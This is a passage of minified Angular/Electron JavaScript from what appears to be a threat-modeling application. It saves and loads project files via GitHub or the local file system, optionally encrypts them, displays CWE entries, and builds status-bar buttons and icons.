ut=Fe.newConfig;this.selectedFile=ut,this.Project||(this.Config.Name=ut.name),Y(yt=>{ut.sha=yt.content.sha,this.addFileToAvailableFiles(ut),this.messagesService.Success("messages.success.saveConfig",ut.name),r()},this.GetRepoOfFile(ut).owner,this.GetRepoOfFile(ut).name,ut.path,Fe.msg,ut.sha,this.Config.ToJSON(),(null!=Fe.pw||te)&&!Fe.removePW,Fe.pw)}else console.log("Should this happen?");else r()})}else console.error("not logged in");else if(i)this.isLoading.add(),q(Re,this.getFileContent(pe.ToJSON(),te)),this.isLoading.remove();else{const Fe=Ne=>{this.addFileToAvailableFiles(Ne),this.SelectedFile.type==Es.Project?(this.messagesService.Success("messages.success.saveProject",this.Project.Name),this.ProjectSaved.emit(this.Project)):(this.messagesService.Success("messages.success.saveConfig",this.Config.Name),this.ConfigChanged.emit(this.Config)),setTimeout(()=>{this.Project&&(this.Project.FileChanged=!1),this.Config&&(this.Config.FileChanged=!1)},500),this.stopUnsavedChangesTimer(),r()};if([hn.GitHub,hn.Import].includes(this.SelectedFile.source)||this.UserMode==Wr.LoggedIn&&e){const Ne={msg:""};(this.SelectedFile.source==hn.Import||e)&&(Ne.newProject={name:"",source:hn.GitHub,type:this.SelectedFile.type,configFile:null,path:"",repoId:this.SelectedFile.repoId,isEncrypted:te,sha:null}),te&&(Ne.removePW=!1),this.dialog.open(jG,{hasBackdrop:!1,data:Ne}).afterClosed().subscribe(ut=>{ut?(null!=Ne.newProject&&(this.selectedFile=Ne.newProject,this.Project.Name=this.selectedFile.name),Y(yt=>{this.selectedFile.sha=yt.content.sha;const It=this.locStorage.Get(si.LAST_FILE),St=JSON.parse(It);this.compareFiles(this.SelectedFile,St)&&this.locStorage.Set(si.LAST_FILE,JSON.stringify(this.SelectedFile)),Fe(this.SelectedFile)},this.GetRepoOfFile(this.SelectedFile).owner,this.GetRepoOfFile(this.SelectedFile).name,this.SelectedFile.path,Ne.msg,this.SelectedFile.sha,pe.ToJSON(),(null!=Ne.pw||te)&&!Ne.removePW,Ne.pw)):r()})}else if(this.SelectedFile.source==hn.FileSystem){0==this.electron.ipcRenderer.listenerCount("SaveFileCallback")&&this.electron.ipcRenderer.on("SaveFileCallback",(et,ut)=>{this.zone.run(()=>{ut?(e&&(this.selectedFile={source:hn.FileSystem,type:this.SelectedFile.type,path:ut,name:this.GetFileName(ut),isEncrypted:this.SelectedFile.isEncrypted},this.Project.Name=this.GetFileName(ut)),Fe(this.SelectedFile)):c()}),this.electron.ipcRenderer.removeAllListeners("SaveFileCallback"),this.isLoading.remove()}),this.isLoading.add();const Ne=this.getFileContent(pe.ToJSON(),te);this.electron.ipcRenderer.send(e?"SaveFileAs":"SaveFile",this.SelectedFile.path,Ne)}}}})})}OnCloseApp(e){var i,n;if((null===(i=this.Project)||void 0===i?void 0:i.FileChanged)||(null===(n=this.Config)||void 0===n?void 0:n.FileChanged))return this.zone.run(()=>{this.OnCloseFile().then(()=>{this.electron.isElectron&&this.electron.ipcRenderer.send("OnCloseApp")})}),e.returnValue=!1,!1}DeleteFile(e){if(this.isLoading.add(),e.source==hn.GitHub)new Sl({auth:this.accessToken}).rest.repos.deleteFile({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,path:e.path,message:"Delete file "+e.name,sha:e.sha,committer:{name:this.UserAccount,email:this.UserEmail}}).then(({})=>{this.messagesService.Success("messages.success.githubdelete",e.name),e==this.SelectedFile&&(this.selectedFile=null,this.Project=null,this.Config=Wu.DefaultFile()),this.removeFileFromAvailableFiles(e)}).catch(n=>{this.messagesService.Error("messages.error.githubdelete",n),console.error(n)}).finally(()=>this.isLoading.remove());else if(e.source==hn.FileSystem){const i={title:this.translate.instant("dialog.delete.deleteItem")+" "+name,textContent:this.translate.instant("dialog.delete.sure"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};this.dialog.open(_M,{hasBackdrop:!0,data:i}).afterClosed().subscribe(r=>{r&&(this.removeFileFromAvailableFiles(e),this.electron.isElectron&&this.electron.ipcRenderer.send("DeleteFile",e.path)),this.isLoading.remove()})}}RemoveFSFile(e){this.removeFileFromAvailableFiles(e)}ExchangeConfig(e){this.exchangeConfigDialog().subscribe(i=>{i&&new Sl({auth:this.accessToken}).repos.getContent({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,path:e.path}).then(({data:r})=>{let c=JSON.parse(O5.from(r.content,"base64").toString()),d=JSON.parse(c.content);this.fileUpdate.UpdateConfigFile(d);let T=this.Project.ToJSON();T.config=d,this.Project=uf.FromJSON(T),this.messagesService.Info("messages.info.exchangeConfig")}).catch(r=>{this.closeFile(),this.messagesService.Error("messages.error.githubfetch",r)}).finally(()=>{this.isLoading.remove()})})}ExchangeConfigWithDefault(){this.exchangeConfigDialog().subscribe(e=>{if(e){let i=Wu.DefaultFile().ToJSON();this.fileUpdate.UpdateConfigFile(i);let n=this.Project.ToJSON();n.config=i,this.Project=uf.FromJSON(n),this.messagesService.Info("messages.info.exchangeConfig")}})}OnTransferProjectDetails(){this.dialog.open(COe)}GetGHProjectHistory(){return new Promise((e,i)=>{let n=[];if(this.SelectedFile){const r=this.UserMode==Wr.LoggedIn?new Sl({auth:this.accessToken}):new Sl,c=this.SelectedFile;r.repos.listCommits({owner:this.GetRepoOfFile(c).owner,repo:this.GetRepoOfFile(c).name,path:c.path}).then(({data:d})=>{d.forEach(T=>{n.push({commiter:T.commit.committer.name,message:T.commit.message,date:T.commit.committer.date,sha:T.sha})}),e(n)}).catch(()=>i())}else e(n)})}OnCloseFile(){return new Promise((e,i)=>{var n,r,c;if((null===(n=this.Project)||void 0===n?void 0:n.FileChanged)||(null===(r=this.Config)||void 0===r?void 0:r.FileChanged)){let d={title:this.translate.instant("dialog.unsaved.title"),textContent:this.translate.instant(null!==(c=this.Project)&&void 0!==c&&c.FileChanged?"dialog.unsaved.saveProject":"dialog.unsaved.saveConfig"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!0};this.dialog.open(_M,{hasBackdrop:!1,data:d}).afterClosed().subscribe(k=>{k?this.OnSave().then(()=>{this.closeFile(),e()}).catch(()=>i()):(this.closeFile(),e())})}else this.closeFile(),e()})}ConsistencyCheck(){return new Promise(e=>{if(this.Project){const i=this.Project.ConsistencyCheck(this.translate);if(i.length>0){let n=this.translate.instant("dialog.consistencycheck.desc")+":\n\n";n+=i.join("\n");let r={title:this.translate.instant("dialog.consistencycheck.title"),textContent:n,resultTrueText:this.translate.instant("general.OK"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1};this.dialog.open(_M,{hasBackdrop:!1,data:r}).afterClosed().subscribe(d=>e(!1))}else e(!0)}else e(!0)})}ManualConsistencyCheck(){this.ConsistencyCheck().then(e=>{e&&this.messagesService.Success("messages.success.ConsistencyCheck")})}SetPassword(e){this.SelectedFile&&(this.SelectedFile.isEncrypted=!0,this.fileContentCrypto=new y5(e))}RemovePassword(){this.SelectedFile&&(this.SelectedFile.isEncrypted=!1)}OpenRepo(e){window.open(this.GetRepoOfFile(e).url,"_blank")}GetRepoOfFile(e){return this.Repos.find(i=>i.id==e.repoId)}GetFileName(e){return e.substring(e.lastIndexOf(gG.sep)+1)}GetFilePath(e){return e.substring(0,e.lastIndexOf(gG.sep))}Debug(){console.log(this.Project),console.log(this.Config);let e=[],i=[];this.Config.GetAttackVectors().forEach(r=>{var c,d;r.OriginTypes.includes(Nm.Weakness)&&(null===(c=r.Weakness)||void 0===c?void 0:c.CWEID)&&e.push(r.Weakness.CWEID),r.OriginTypes.includes(Nm.AttackTechnique)&&(null===(d=r.AttackTechnique)||void 0===d?void 0:d.CAPECID)&&i.push(r.AttackTechnique.CAPECID)}),e.sort((r,c)=>r-c),i.sort((r,c)=>r-c);let n=["Supported CWEs:",e,"Supported CAPECs:",i,"Threat Categories: ",this.Config.GetThreatCategories().length.toString()];n.push("Threats: ",this.Config.GetAttackVectors().length.toString(),"Threat Rules: ",this.Config.GetThreatRules().length.toString()),this.Config.GetThreatQuestions().length.toString(),console.log(n)}Debug2(){if(!this.Project)return;let e=this.Project.ToJSON();delete e.config;let i=JSON.stringify(e,null,2);const n=this.clipboard.beginCopy(i);let r=3;const c=()=>{!n.copy()&&--r?setTimeout(c):n.destroy()};return c(),i}Debug3(){let e=JSON.stringify(this.Config.ToJSON(),null,2);const i=this.clipboard.beginCopy(e);let n=3;const r=()=>{!i.copy()&&--n?setTimeout(r):i.destroy()};return r(),e}checkAppVersionUpdate(){const e=this.locStorage.Get(si.CURRENT_VERSION);if(e&&hf_i!=e){if(this.isNewVersion(hf_i,"0.4.18")&&!this.isNewVersion(e,"0.4.18")){this.locStorage.Remove(si.LAST_FILE);const i=this.locStorage.Get(si.FILE_HISTORY);if(i){const n=JSON.parse(i),r=[];n.forEach(c=>{const d=c.split(":"),T="FS"==d[0]?hn.FileSystem:hn.GitHub,k={path:d[1],name:this.GetFileName(d[1]),source:T,type:Es.Project,isEncrypted:null};T==hn.GitHub&&(k.repoId=Number(d[0])),r.push(k)}),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(r))}}setTimeout(()=>{this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.versionUpdate"),hf_i))},5e3)}this.locStorage.Set(si.CURRENT_VERSION,hf_i)}getFileContent(e,i,n=null){this.isLoading.add(),this.SelectedFile&&(this.SelectedFile.isEncrypted=i);const r={content:JSON.stringify(e)};if(i){n&&(this.fileContentCrypto=new y5(n));let d=JSON.parse(JSON.stringify(r));r.content=this.fileContentCrypto.Encrypt(JSON.stringify(d.content)),r.encrypted=this.fileContentCrypto.Encrypt(this.fileContentCrypto.GetRandom(16).toString("base64"))}const c=JSON.stringify(r);return this.isLoading.remove(),c}exchangeConfigDialog(){let e={title:this.translate.instant("dialog.configexchange.title"),textContent:this.translate.instant("dialog.configexchange.desc"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.dialog.open(_M,{hasBackdrop:!1,data:e}).afterClosed()}closeFile(){this.Project=null,this.Config=null,this.selectedFile=null,this.locStorage.Remove(si.LAST_FILE),this.Config=Wu.DefaultFile(),this.Config.FileChanged=!1,this.router.navigate(["/"])}addFileToAvailableFiles(e){if(e){this.AvailableFiles.some(n=>this.compareFiles(n,e))||this.availableFiles.splice(0,0,e);const i=this.getLastFileHistory();this.availableFiles=this.availableFiles.sort((n,r)=>{var c,d;if(n.source==hn.GitHub&&(null===(c=this.GetRepoOfFile(n))||void 0===c||!c.isWritable))return 1;if(r.source==hn.GitHub&&(null===(d=this.GetRepoOfFile(r))||void 0===d||!d.isWritable))return-1;let T=i.findIndex(q=>this.compareFiles(q,n)),k=i.findIndex(q=>this.compareFiles(q,r));return T>=0||k>=0?(-1==T&&(T=Number.MAX_VALUE),-1==k&&(k=Number.MAX_VALUE),T<k?-1:1):void 0})}}removeFileFromAvailableFiles(e){this.removeFileFromHistory(e);const i=this.AvailableFiles.findIndex(n=>this.compareFiles(n,e));i>=0&&this.availableFiles.splice(i,1)}addFileToHistory(e){if(e&&(this.KeepUserSignedIn||e.source==hn.FileSystem)){const i=this.getLastFileHistory(),n=i.findIndex(r=>this.compareFiles(r,e));n>=0&&i.splice(n,1),i.splice(0,0,e),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(i)),this.locStorage.Set(si.LAST_FILE,JSON.stringify(e)),this.addFileToAvailableFiles(e)}}removeFileFromHistory(e){if(e&&e.path){const i=this.getLastFileHistory(),n=i.findIndex(c=>this.compareFiles(c,e));n>=0&&i.splice(n,1),this.locStorage.Set(si.FILE_HISTORY,JSON.stringify(i));const r=JSON.parse(this.locStorage.Get(si.LAST_FILE));r&&this.SelectedFile&&r.source==hn.GitHub&&this.compareFiles(r,this.SelectedFile)&&this.locStorage.Remove(si.LAST_FILE)}}getLastFileHistory(){const e=this.locStorage.Get(si.FILE_HISTORY);return e?JSON.parse(e):[]}clearLoginData(){this.locStorage.Remove(si.AUTH_ACCESS_TOKEN),this.locStorage.Remove(si.AUTH_LAST_CODE),this.locStorage.Remove(si.GH_ACCOUNT_NAME),this.locStorage.Remove(si.GH_USER_NAME),this.locStorage.Remove(si.GH_USER_URL),this.userMode=Wr.None,this.userAccount=this.userName=this.accessToken=this.userURL=""}retrieveUser(){if(this.accessToken&&this.accessToken.length>0){this.isLoading.add();const e=new Sl({auth:this.accessToken});e.request("GET /user").then(({data:i})=>{const n=()=>{this.KeepUserSignedIn&&(this.locStorage.Set(si.GH_ACCOUNT_NAME,this.userAccount),this.locStorage.Set(si.GH_USER_NAME,this.userName),this.locStorage.Set(si.GH_USER_URL,this.userURL),this.locStorage.Set(si.GH_USER_EMAIL,this.userEmail)),this.retrieveRepositories(),this.router.navigate(["/home"])};this.userAccount=i.login,this.userName=i.name,this.userURL=i.html_url,this.userEmail=i.email,this.UserEmail?n():e.users.listEmailsForAuthenticatedUser().then(({data:r})=>{this.userEmail=r.find(c=>c.primary).email,n()}).catch(r=>this.messagesService.Error("messages.error.githubfetch",r)).finally(()=>this.isLoading.remove())}).catch(i=>{this.messagesService.Error("messages.error.githubfetch",i)}).finally(()=>this.isLoading.remove())}}retrieveRepositories(){this.repos=[];const e=(n,r,c,d,T)=>{this.addFileToAvailableFiles({repoId:r,name:c,path:d,sha:T,isEncrypted:!1,source:hn.GitHub,type:n});const q=this.locStorage.Get(si.LAST_FILE);if(!this.blockLoading&&this.KeepUserSignedIn&&q){const Y=JSON.parse(q),te=this.AvailableFiles.find(pe=>pe.source==hn.GitHub&&this.compareFiles(pe,Y));te&&(this.blockLoading=!0,this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.loadFile"),te.name)),this.OnLoadFile(te),setTimeout(()=>{this.blockLoading=!1},5e3))}};this.getExampleRepository().finally(()=>{const n=r=>{this.repos.forEach(c=>{this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:""}).then(({data:d})=>{d.some(T=>"projects"==T.name&&"dir"==T.type)&&(this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:"projects"}).then(({data:T})=>{T.filter(k=>k.name.endsWith(".ttmp")).forEach(k=>{e(Es.Project,c.id,k.name,k.path,k.sha)})}).finally(()=>{this.isLoading.remove()})),d.some(T=>"configs"==T.name&&"dir"==T.type)&&(this.isLoading.add(),r.repos.getContent({owner:c.owner,repo:c.name,path:"configs"}).then(({data:T})=>{T.filter(k=>k.name.endsWith(".ttmc")).forEach(k=>{e(Es.Config,c.id,k.name,k.path,k.sha)})}).finally(()=>{this.isLoading.remove()}))}).finally(()=>{this.isLoading.remove()})})};if(this.UserMode==Wr.LoggedIn){const r=new Sl({auth:this.accessToken});this.isLoading.add(),r.repos.listForAuthenticatedUser().then(({data:c})=>{c.forEach(d=>{let T={id:d.id,name:d.name,owner:d.owner.login,url:d.html_url,updated:new Date(d.updated_at),private:d.private,isWritable:!0};this.repos.push(T)}),n(r)}).finally(()=>{this.isLoading.remove()})}else n(new Sl)})}getExampleRepository(){this.isLoading.add();const e=new Sl,i="SecSimon",n="TTM-examples",r=e.repos.get({owner:i,repo:n});return r.then(c=>{let T={id:c.data.id,name:n,owner:i,url:c.data.html_url,updated:new Date(c.data.updated_at),private:c.data.private,isWritable:!1};this.repos.push(T)}).catch(c=>{this.messagesService.Error(c.message)}).finally(()=>{this.isLoading.remove()}),r}restoreUserAccount(){this.accessToken=this.locStorage.Get(si.AUTH_ACCESS_TOKEN),Gi.NullOrEmpty(this.accessToken)||(this.userMode=Wr.LoggedIn),this.userName=this.locStorage.Get(si.GH_USER_NAME),this.userAccount=this.locStorage.Get(si.GH_ACCOUNT_NAME),this.userURL=this.locStorage.Get(si.GH_USER_URL),this.userEmail=this.locStorage.Get(si.GH_USER_EMAIL),this.UserMode==Wr.LoggedIn&&setTimeout(()=>{this.messagesService.Success("messages.success.welcomeBack",Gi.EmptyIfNull(this.UserDisplayName))},500)}compareFiles(e,i){return e.source==i.source&&e.name==i.name&&e.path==i.path&&e.repoId==i.repoId}isNewVersion(e,i){const n=i.replace("v","").split("."),r=e.replace("v","").split(".");if(n.length==r.length)for(let c=0;c<n.length;c++){if(Number(r[c])>Number(n[c]))return!0;if(Number(r[c])<Number(n[c]))break}return!1}startUnsavedChangesTimer(){null==this.unsavedChangesTimer&&(this.unsavedChangesMinutes=0,this.unsavedChangesTimer=setInterval(()=>{this.unsavedChangesMinutes++,this.unsavedChangesMinutes%5==0&&this.messagesService.ShowUnsavedChanges&&(this.messagesService.UnsavedChanges(Gi.Format(this.translate.instant("messages.warning.unsavedChanges"),this.unsavedChangesMinutes.toString())),this.ConsistencyCheck())},6e4))}stopUnsavedChangesTimer(){this.unsavedChangesTimer&&(clearInterval(this.unsavedChangesTimer),this.unsavedChangesTimer=null)}}return t.\u0275fac=function(e){return new(e||t)(At(_r),At($G),At(rp),At(Oo),At(hz),At(vu),At(A2),At(Sn),At(D5),At(qi),At(ST))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function bOe(t,a){if(1&t&&(m(0,"mat-form-field",6),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),it(6,"textarea",7),s(7,"\n  "),u()),2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("ExtendedDescription"))}}function MOe(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"tr"),s(3,"\n          "),m(4,"td",12),s(5),u(),s(6,"\n          "),m(7,"td"),s(8,"Technical Impact: "),m(9,"em"),s(10),u()(),s(11,"\n        "),u(),s(12,"\n        "),m(13,"tr")(14,"td"),s(15),u()(),s(16,"\n      "),Mt()),2&t){const e=a.$implicit,i=B(3);C(5),ke(i.GetValues(e.Scope,!1)),C(5),ke(i.GetValues(e.Impact,!0)),C(5),ke(i.GetValues(e.Note,!1))}}function vOe(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"table"),s(3,"\n      "),m(4,"tr",10)(5,"th"),s(6,"Scope"),u(),m(7,"th"),s(8,"Impact"),u()(),s(9,"\n      "),ne(10,MOe,17,3,"ng-container",11),s(11,"\n    "),u(),s(12,"\n  "),Mt()),2&t){const e=B(2);C(10),V("ngForOf",e.GetCWEConsequences())}}function AOe(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),it(8,"input",3),s(9,"\n  "),u(),s(10,"\n  "),m(11,"mat-form-field",4),s(12,"\n    "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n    "),it(17,"input",3),s(18,"\n  "),u(),s(19,"\n  "),m(20,"button",5),he("click",function(){return be(e),Me(B().OpenCWE())}),oe(21,"translate"),s(22,"\n    "),m(23,"mat-icon"),s(24,"open_in_new"),u(),s(25,"\n  "),u(),s(26,"\n  "),m(27,"mat-form-field",6),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),it(33,"textarea",7),s(34,"\n  "),u(),s(35,"\n  "),ne(36,bOe,8,5,"mat-form-field",8),s(37,"\n  "),ne(38,vOe,13,1,"ng-container",9),s(39,"\n"),u()}if(2&t){const e=B();C(5),ke(re(6,12,"properties.CWETitle")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWETitle()),C(6),ke(re(15,14,"properties.likelihoodOfExploit")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("Likelihood_Of_Exploit")),C(3),at("matTooltip",re(21,16,"general.openInNew")),C(10),ke(re(31,18,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCWEProperty("Description")),C(3),V("ngIf",e.GetCWEProperty("ExtendedDescription")),C(2),V("ngIf",e.GetCWEConsequences()&&e.GetCWEConsequences().length>0)}}let N5=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.cweID||console.error("Unset cweID")}OpenCWE(){window.open(t.GetURL(this.cweID),"_blank")}GetCWETitle(){return this.GetCWEEntry()?"CWE-"+Np[this.cweID].attr["@_ID"]+": "+Np[this.cweID].attr["@_Name"]+" ("+Np[this.cweID].attr["@_Status"]+")":null}GetCWEProperty(e){return this.GetCWEEntry()?this.GetCWEEntry()[e]?this.GetCWEEntry()[e]:"":null}GetCWEEntry(){return Np[this.cweID]}GetCWEConsequences(){return this.GetCWEEntry()&&Np[this.cweID].Common_Consequences?Array.isArray(Np[this.cweID].Common_Consequences.Consequence)?Np[this.cweID].Common_Consequences.Consequence:[Np[this.cweID].Common_Consequences.Consequence]:null}GetValues(e,i){return Array.isArray(e)?e.join(i?"; ":"\n"):e}static GetURL(e){return"https://cwe.mitre.org/data/definitions/"+e.toString()+".html"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-cwe-entry"]],inputs:{cweID:"cweID"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","calc(100% - 250px)","margin-right","5px"],["matInput","","type","text",3,"spellcheck","value"],["appearance","fill",2,"width","200px","margin-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"spellcheck","value"],["appearance","fill","style","width: 100%;",4,"ngIf"],[4,"ngIf"],[2,"text-align","left"],[4,"ngFor","ngForOf"],["rowSpan","2",2,"vertical-align","top"]],template:function(e,i){1&e&&ne(0,AOe,40,20,"div",0),2&e&&V("ngIf",i.cweID)},dependencies:[Zi,Ri,oa,da,nn,un,Go,Xa,Pa,Xi]}),t})(),pf=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:dm,deps:[yT],useFactory:a=>a.Locale},{provide:q1,useClass:JRe},{provide:zq,useValue:axe}],imports:[rn,bs,iw,z4,ux,iH,Gq,sH,cH,Iq,Vq,fz,Aw,xw,_W,Hy,ib,VW,zW,BW,jW,hp,QW,s8,SF,l8,OF,BF,aA,XF,o8,h8,p8,aV,u8,yV,_8,y8,AV,xV,kV,zV,bW,Pd,WV,VV,ZV,tB,iB,bu,iw,z4,ux,iH,sH,cH,Iq,Vq,fz,Aw,xw,_W,Hy,ib,VW,zW,BW,jW,hp,QW,s8,SF,l8,OF,BF,aA,XF,o8,h8,p8,aV,u8,yV,_8,y8,AV,xV,kV,zV,bW,Pd,WV,VV,ZV,tB,iB,bu]}),t})();Ds(w5,[Zi,Ri,an,Ta,Ea,oa,da,nn,un,jr,qh,V1,Mu,Uh,Go,Xa,es,ts,Or,Lr,rc,Pa,vg,tl,Ec,Dc,el,Il,Cp,WG,R5,qG],[Xi,E5]),Ds(HG,[Ri,an,Ta,Ea,oa,da,nn,un,jr,Xa,wl,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,x8,I5],[Xi,T5]),Ds(I5,[Zi,Ri,an,Ac,Ta,Ea,oa,da,nn,un,Go,Xa,Pa,tl,Ec,Dc,el,Il,N5],[Xi,T5]),Ds(R5,[nn,Xa,Qp],[Xi]);var V$={prefix:"fas",iconName:"left-right",icon:[512,512,[8596,"arrows-alt-h"],"f337","M504.3 273.6c4.9-4.5 7.7-10.9 7.7-17.6s-2.8-13-7.7-17.6l-112-104c-7-6.5-17.2-8.2-25.9-4.4s-14.4 12.5-14.4 22l0 56-192 0 0-56c0-9.5-5.7-18.2-14.4-22s-18.9-2.1-25.9 4.4l-112 104C2.8 243 0 249.3 0 256s2.8 13 7.7 17.6l112 104c7 6.5 17.2 8.2 25.9 4.4s14.4-12.5 14.4-22l0-56 192 0 0 56c0 9.5 5.7 18.2 14.4 22s18.9 2.1 25.9-4.4l112-104z"]},Z5={prefix:"fas",iconName:"code-branch",icon:[448,512,[],"f126","M80 104c13.3 0 24-10.7 24-24s-10.7-24-24-24S56 66.7 56 80s10.7 24 24 24zm80-24c0 32.8-19.7 61-48 73.3v87.8c18.8-10.9 40.7-17.1 64-17.1h96c35.3 0 64-28.7 64-64v-6.7C307.7 141 288 112.8 288 80c0-44.2 35.8-80 80-80s80 35.8 80 80c0 32.8-19.7 61-48 73.3V160c0 70.7-57.3 128-128 128H176c-35.3 0-64 28.7-64 64v6.7c28.3 12.3 48 40.5 48 73.3c0 44.2-35.8 80-80 80s-80-35.8-80-80c0-32.8 19.7-61 48-73.3V352 153.3C19.7 141 0 112.8 0 80C0 35.8 35.8 0 80 0s80 35.8 80 80zm232 0c0-13.3-10.7-24-24-24s-24 10.7-24 24s10.7 24 24 24s24-10.7 24-24zM80 456c13.3 0 24-10.7 24-24s-10.7-24-24-24s-24 10.7-24 24s10.7 24 24 24z"]},XX={prefix:"fas",iconName:"right-long",icon:[512,512,["long-arrow-alt-right"],"f30b","M334.5 414c8.8 3.8 19 2 26-4.6l144-136c4.8-4.5 7.5-10.8 7.5-17.4s-2.7-12.9-7.5-17.4l-144-136c-7-6.6-17.2-8.4-26-4.6s-14.5 12.5-14.5 22l0 88L32 208c-17.7 0-32 14.3-32 32l0 32c0 17.7 14.3 32 32 32l288 0 0 88c0 9.6 5.7 18.2 14.5 22z"]};function Qst(t,a){if(1&t&&(bt(0),m(1,"mat-icon",8),s(2,"check_circle"),u(),s(3),Mt()),2&t){const e=B();C(3),ke(e.messagesService.SuccessMsgs.length)}}function $st(t,a){if(1&t&&(bt(0),m(1,"mat-icon",8),s(2,"info"),u(),s(3),Mt()),2&t){const e=B();C(3),ke(e.messagesService.InfoMsgs.length)}}function Kst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B(2).dialogService.OpenPasswordProtectionDialog())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"lock"),u(),s(5," \n    "),u()}2&t&&at("matTooltip",re(1,1,"status-bar.passwordProtectionOn"))}function Xst(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).dialogService.OpenPasswordProtectionDialog())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"lock_open_right"),u(),s(5," \n    "),u()}if(2&t){const e=B(2);at("matTooltip",re(1,2,"status-bar.passwordProtectionOff")),V("disabled",!e.dataService.SelectedFile)}}function Yst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B(2).dataService.OnSave(!1,!0))}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"file_download"),u(),s(5," \n    "),u()}2&t&&at("matTooltip",re(1,1,"pages.home.menu.downloadProject"))}function Jst(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(B(2).dataService.OnSave(!1,!0,!0))}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon",2),s(4,"file_download"),u(),s(5," \n    "),u()}2&t&&at("matTooltip",re(1,1,"pages.home.menu.downloadConfig"))}function Zst(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",9),he("click",function(){return be(e),Me(B().dialogService.OpenModelInfoDialog())}),s(3,"\n      "),m(4,"mat-icon",2),s(5,"source"),u(),s(6,"\n    "),u(),s(7,"\n    "),m(8,"button",10),he("click",function(){return be(e),Me(B().dialogService.OpenModelChangesDialog())}),s(9,"\n      "),m(10,"span"),s(11),u(),s(12,"\n    "),u(),s(13,"\n    "),ne(14,Kst,6,3,"button",11),s(15,"\n    "),ne(16,Xst,6,4,"button",12),s(17,"\n    "),m(18,"button",13),he("click",function(){return be(e),Me(B().dialogService.OpenModelTasksNotesDialog())}),oe(19,"translate"),s(20,"\n      "),m(21,"mat-icon",2),s(22,"edit_note"),u(),s(23," \n    "),u(),s(24,"\n    "),m(25,"button",14),he("click",function(){return be(e),Me(B().dataService.ManualConsistencyCheck())}),oe(26,"translate"),s(27,"\n      "),m(28,"mat-icon",2),s(29,"flaky"),u(),s(30," \n    "),u(),s(31,"\n    "),m(32,"button",15),he("click",function(){return be(e),Me(B().dataService.OnSave())}),oe(33,"translate"),s(34,"\n      "),m(35,"mat-icon",2),s(36,"save"),u(),s(37," \n    "),u(),s(38,"\n    "),m(39,"button",14),he("click",function(){return be(e),Me(B().dataService.OnSave(!0))}),oe(40,"translate"),s(41,"\n      "),m(42,"mat-icon",2),s(43,"save_as"),u(),s(44," \n    "),u(),s(45,"\n    "),ne(46,Yst,6,3,"button",11),s(47,"\n    "),ne(48,Jst,6,3,"button",11),s(49,"\n    "),m(50,"button",14),he("click",function(){return be(e),Me(B().dataService.ReloadFile())}),oe(51,"translate"),s(52,"\n      "),m(53,"mat-icon",2),s(54,"refresh"),u(),s(55," \n    "),u(),s(56,"\n  "),Mt()}if(2&t){const 